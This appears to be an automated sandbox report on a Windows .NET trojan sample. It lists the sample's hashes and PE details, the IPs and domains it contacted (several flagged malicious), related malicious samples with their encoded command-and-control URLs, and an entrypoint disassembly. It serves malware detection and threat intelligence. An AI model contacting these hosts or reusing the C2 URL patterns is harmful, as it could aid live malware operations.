                                                http://www.founder.com.cn/cn/cTheSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://fontfabrik.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cnSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.galapagosdesign.com/DPleaseSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers8SKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.%s.comPAexplorer.exe, 00000006.00000000.716763832.0000000002B50000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		low
                                                    http://www.fonts.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.sandoll.co.krSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.urwpp.deDPleaseSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.zhongyicts.com.cnSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSKlGhwkzTi.exe, 00000000.00000002.679283133.0000000002DE1000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.sakkal.comSKlGhwkzTi.exe, 00000000.00000002.687510936.0000000006F02000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.707799994.000000000B970000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.21.65.7
                                                        		www.cyrilgraze.comUnited States
                                                        		13335CLOUDFLARENETUStrue
                                                        198.185.159.144
                                                        		ext-sq.squarespace.comUnited States
                                                        		53831SQUARESPACEUSfalse
                                                        151.106.118.75
                                                        		biztekno.comGermany
                                                        		61157PLUSSERVER-ASN1DEtrue
                                                        163.43.122.119
                                                        		www.69-1hn7uc.netJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                        44.227.65.245
                                                        		pixie.porkbun.comUnited States
                                                        		16509AMAZON-02USfalse
                                                        78.31.67.91
                                                        		cleanxcare.comGermany
                                                        		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
                                                        192.169.223.13
                                                        		centergolosinas.comUnited States
                                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                                        General Information

                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                        Analysis ID:432735
                                                        Start date:10.06.2021
                                                        Start time:17:57:04
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 11m 18s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:SKlGhwkzTi (renamed file extension from none to exe)
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:19
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@8/1@8/7
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 8.2% (good quality ratio 7.4%)
                                                        • Quality average: 73.3%
                                                        • Quality standard deviation: 31.4%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.88.21.125, 184.30.21.219, 92.122.145.220, 52.147.198.201, 168.61.161.212, 20.82.210.154, 20.75.105.140, 20.72.88.19, 20.54.26.129, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194
                                                        • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        17:58:05API Interceptor1x Sleep call for process: SKlGhwkzTi.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        104.21.65.76d56768e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?hnKP_0F0=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&nfrxU8=yVMtB8oP
                                                        APPROVED.xlsxGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P
                                                        lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?iBIXf4M=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&_RAd4V=YL0THJvhl8d
                                                        dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?0pk=FtxhArA&FjUHSn=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1ZX8ma6yUqB
                                                        lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?E48=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VuwH26lS2QTgoFqA==&oPqLWb=dVeDBDrHInjx
                                                        gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?K81d7=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25ts36CozLG&uTrL=Apdlbf
                                                        g0g865fQ2S.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?4h3=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O25HzHKCsxDG&vTapK=LJBpc8p
                                                        loMStbzHSP.exeGet hashmaliciousBrowse
                                                        • www.cyrilgraze.com/p2io/?7nEpiRy=PONkgH6MO5ViG+zjbj4YyU3gBn/U0y1OFStIgCLmvXYcYHdxqE5/6Lr2O1VXv2W5rEqXTgoC5w==&sZvD8l=Spap-DKpf
                                                        198.185.159.144New Purchase Order20210609.exeGet hashmaliciousBrowse
                                                        • www.kokoshaveice.com/un8c/?3f-H3H=aZaLIE/CsZEbnkZXVKNJbEuElQpMoyTdbfBzj8jhRt7QilQZi3fXZMlsJ6JzgR8z/eaN&6lGd=HBZ81PLPUzqhOj
                                                        LkvumUsaQX.exeGet hashmaliciousBrowse
                                                        • www.totally-seo.com/p2io/?7ntDA=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7PESKodUP59hGuNmhA==&p48x=MN6xDxf80FMxbj4
                                                        Payment slip.exeGet hashmaliciousBrowse
                                                        • www.shopkaitek.com/3edq/?2dUX-PAP=M8eNvF5zuYq6F34lAt80R5nTraHCYrh0rbrF9J+SqtSL9q0uJh3MK9H55PeJhjWLLkFu&D6Otan=1bu800r
                                                        New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                        • www.kokoshaveice.com/un8c/?z8b=iZspkzE0JnS86&m6=aZaLIE/CsZEbnkZXVKNJbEuElQpMoyTdbfBzj8jhRt7QilQZi3fXZMlsJ6FzzBwwmOab/JVn8A==
                                                        tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                        • www.totally-seo.com/p2io/?6lFp-=X8U4Iv&Yr0=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw
                                                        8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                        • www.mkpricephoto.com/sh2m/?8pQLN=M5mtQoHkyhxvNjqVlN4PGsv6kOee2cR+qVO1qalFjtpNC9HX6pJqwZiEg4Ppodp8IyRJ90NYeQ==&D6Ot3x=-Z8XfPP
                                                        17jLieeOPx.exeGet hashmaliciousBrowse
                                                        • www.totally-seo.com/p2io/?D48=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&2dYX6=1b-D6VYx
                                                        fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                        • www.anewdistraction.com/p2io/?d0=5juHFPp&3fut_=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAc6EPDBh5FJ4wioMw==
                                                        scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                        • www.brooklynbrewbazaar.com/fmjo/?2dS4SpX8=qUbk/uSP+pf6p8qmG7yr2cJmoye0DgYz5erMRyDDKx4Ymj9j4BqWqohjbtdVFlEBw6X/&qXYlb=6lNDIzXhO2g0
                                                        SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                        • www.naturalbeautyapparel.com/ftgq/?8p=58hLLa3vc2EaUDgAeKLskrXr8RI4DwN7z0OiuDdYZF5g/qPz05bciOqqek20YkD5yVzPo95r2g==&C48xf8=VFQ8p8YH
                                                        rove.exeGet hashmaliciousBrowse
                                                        • www.weab3.com/aipc/?6lSp=ArO83PE0Mh0TtZa0&bv4=/8Z60H0U3EWOvTAhTSZ91XRC3z3gfjmKnWg9Zo5NhivUL2SmA7Vc3Hh6HSm+FPngCfqp
                                                        Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                        • www.the-vma.com/j6xw/?pR-xqjW=KJ21CI6nWllw3jb6LNy/7vVKy2oA2dLgDihDwOEUrsElLp9L7M0HGY7NagSED+cXyB7S&srL4=IdpX_hpxaNVLNhX
                                                        1092991(JB#082).exeGet hashmaliciousBrowse
                                                        • www.shopkaitek.com/3edq/?JfEt9j6h=M8eNvF5zuYq6F34lAt80R5nTraHCYrh0rbrF9J+SqtSL9q0uJh3MK9H55PeJhjWLLkFu&ojn0d=RzuliD
                                                        Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                        • www.kellymoorefilms.com/5yue/?GFNDG=9mA+j1cgE0zxC7u3qAlNO+Wrolxb+XCp7JX8Z/rof2uElfHtAjnndbvjTcdg6uA8+xkX&Jv7=XVIXpLcx
                                                        #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                        • www.cljcandles.com/pux4/?Lv0h=urYAAIc58DnUlhBmQa3gzHotkVmoZ0i8F09uLhqyCxRxwOZO+pPIwoj8ux/FJwO59BkQzbo13w==&VlKt=wBNl4pd0L
                                                        HEN.exeGet hashmaliciousBrowse
                                                        • www.portsidemonograms.com/aipc/?TlPt=tbuhbkKiZMbT51ggHlN5rcc+6ZFSDnA65ra1I1/h1SUWu7EEXe8DiVlqCzHYPKZm0j3JlFNexg==&6l=mnSl
                                                        Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                        • www.weab3.com/aipc/?K8kl=/8Z60H0U3EWOvTAhTSZ91XRC3z3gfjmKnWg9Zo5NhivUL2SmA7Vc3Hh6HSqHJuLgVZ24lc1TFw==&lxo8y=MzuD_P1pZJ
                                                        Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                        • www.jessicarusselldesign.com/gad0/?1bB=YNKficl4JuMpHD9ZucCDdKw50e3rZtwSzoj4IBtnMReh6UW5QmvMrqjFxOO0E0XDXWWo&3fS=dfc8-RnPKT4
                                                        DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                        • www.wombatwellness.com/vfm2/?2d=mlyx&tzr8=UK/k0ZYUzZvJjxXC0JaC6NFAiBcJLAkUYbslNP+YAqhew59pS6ch9v0JexfzNGtQhbXqRxr51g==
                                                        Pdf Scen Invoice 17INV06003.exeGet hashmaliciousBrowse
                                                        • www.paperlessconsulting.com/s5cm/?k2JxoV=fDKdgJeh5&0bMpLRa=OgwzyNm2z9yPgyWx1Isexu6xb7DlPFRlczqmtYSYXM3VyngRt3QDJ98NtJ5WWIsYqkZ2

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        CLOUDFLARENETUSRFQ-sib.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        PO.docGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Evershedsnicea NDA file attach...htmGet hashmaliciousBrowse
                                                        • 104.16.18.94
                                                        SecuriteInfo.com.Trojan.PackedNET.825.24532.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        090049000009000.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Letter 1019.xlsxGet hashmaliciousBrowse
                                                        • 172.67.161.4
                                                        fTxhRIDnrC.dllGet hashmaliciousBrowse
                                                        • 104.20.185.68
                                                        Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                        • 23.227.38.74
                                                        Order.exeGet hashmaliciousBrowse
                                                        • 104.21.40.174
                                                        DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        RRY0yKj2HM.dllGet hashmaliciousBrowse
                                                        • 104.20.184.68
                                                        SecuriteInfo.com.Trojan.PackedNET.721.2973.exeGet hashmaliciousBrowse
                                                        • 104.23.98.190
                                                        SecuriteInfo.com.Trojan.PackedNET.831.4134.exeGet hashmaliciousBrowse
                                                        • 104.23.98.190
                                                        SWIFT COMMERCIAL DUTY 0218J.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        p8Wo6PbOjL.exeGet hashmaliciousBrowse
                                                        • 162.159.130.233
                                                        b7cgnOpObK.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        Invoice 8-6-2021.exeGet hashmaliciousBrowse
                                                        • 172.67.188.154
                                                        PO187439.exeGet hashmaliciousBrowse
                                                        • 104.21.81.138
                                                        090009000000090.exeGet hashmaliciousBrowse
                                                        • 104.21.19.200
                                                        PLUSSERVER-ASN1DEBL & INV.docGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        BL & INV.docGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        BL & INV.docGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        8cuLxttsra.exeGet hashmaliciousBrowse
                                                        • 31.210.21.161
                                                        Owbtvvu.exeGet hashmaliciousBrowse
                                                        • 31.210.20.60
                                                        Inqquuirrryyy202106079768900100.exeGet hashmaliciousBrowse
                                                        • 31.210.21.188
                                                        Swift MT103 Transfer.xlsxGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        inqqqqquiry9867120210406000900.exeGet hashmaliciousBrowse
                                                        • 31.210.21.188
                                                        tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        IMG_1741000.xlsxGet hashmaliciousBrowse
                                                        • 31.210.20.45
                                                        QyKNw7NioL.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        Compliance - Notice 06-03.xlsxGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        Request for Courtesy Call - Urgent.xlsxGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        Payment Advice Reference No SWT005262021.exeGet hashmaliciousBrowse
                                                        • 31.210.20.60
                                                        Payment Advice Reference0000 docx.exeGet hashmaliciousBrowse
                                                        • 31.210.20.60
                                                        BVYzIQc9Q3.exeGet hashmaliciousBrowse
                                                        • 31.210.21.63
                                                        9XfX7aaf3F.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                        • 151.106.118.75
                                                        20210524_0019019939010.exeGet hashmaliciousBrowse
                                                        • 31.210.21.188
                                                        SQUARESPACEUSNew Purchase Order20210609.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        LkvumUsaQX.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Payment slip.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        17jLieeOPx.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        rove.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        1092991(JB#082).exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        HEN.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                        • 198.185.159.144
                                                        Qgc2Nreer3.exeGet hashmaliciousBrowse
                                                        • 198.185.159.176

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKlGhwkzTi.exe.log
                                                        Process:C:\Users\user\Desktop\SKlGhwkzTi.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.543136116156561
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                        File name:SKlGhwkzTi.exe
                                                        File size:782336
                                                        MD5:8252e0bd8e579259cc18ceae0c5c6d64
                                                        SHA1:242c3feb78e57de5c30b6f4f6b6d5d9b3332eb08
                                                        SHA256:21b3aba425cfa96bd3c5db2b306591a3a2aa1c8ee6fbdeddfdf60b5e1c0df0ea
                                                        SHA512:58be9b9c10d14a695b1b36315528eadc8d5f0380f8061814bb4d1d0eafd5c2a4293f5f36249befa44a15932dcb554371e32ceaa418d51236ca22740893e46c08
                                                        SSDEEP:12288:ldam8GlMV40J8Sd2AjMqioxcYP3iJ9LfPnkSrIlGOLq+hJickHu9ue6eO1wPIl:ldam8GUwxucYP3ojn5rIAQqEickHu8VZ
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<..`.....................N........... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:b6f8c8dccce06110

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4bbf1e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x60C0873C [Wed Jun 9 09:17:48 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
